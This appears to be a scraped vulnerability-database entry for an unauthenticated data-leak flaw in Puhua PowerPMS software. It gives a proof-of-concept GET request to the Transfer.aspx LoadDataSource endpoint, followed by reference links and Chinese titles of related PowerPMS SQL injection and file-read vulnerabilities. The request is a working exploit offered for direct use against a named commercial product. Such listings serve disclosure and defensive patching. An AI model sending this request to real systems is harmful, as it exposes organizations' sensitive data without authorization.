PoC Copy GET /PowerPlat/Tools/Transfer.aspx?ServerOperatorType=LoadDataSource HTTP/1.1 # Visit https://trap.biu.life/ to view exploit trends for this vulnerability. Source: https://vip.vulbox.com/detail/1977654475921428480
References https://mrxn.net/jswz/powerpms-Transfer-LoadDataSource-data-leak.html https://www.ddpoc.com/DVB-2024-6651.html https://github.com/leyiang12138/-POC-/tree/main/%E6%99%AE%E5%8D%8E%E7%A7%91%E6%8A%80-PowerPMS%20Transfer.aspx%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%BC%8F%E6%B4%9E https://cn-sec.com/archives/4601867.html https://cn-sec.com/archives/4587799.html https://www.ddpoc.com/DVB-2024-7214.html
Related Vulnerabilities普华科技-PowerPMS系统未授权敏感信息泄露漏洞普华PowerPMS系统越权数据泄露漏洞Evertz SDVN /v.1.5/php/features/feature-transfer-export.php 命令执行漏洞(CVE-2025-4009)PoCCVE-2023-35708: MOVEit Transfer - SQL Injection上海普华科技PowerPMS /UploadFle/GetFilesData SQL 注入漏洞PoCCVE-2018-17082: Apache2 - Transfer-Encoding Chunked XSSPoC普华科技-PowerPMS Reg.ashx接口存在SQL注入漏洞PoC普华科技 PowerPMS /PowerPlat/FormXml/DocFile/OfficeService.aspx 文件读取漏洞PoC普华PowerPMS /weixin3.0/Reg.ashx SQL 注入漏洞PowerPMS File.ashx存在SQL注入漏洞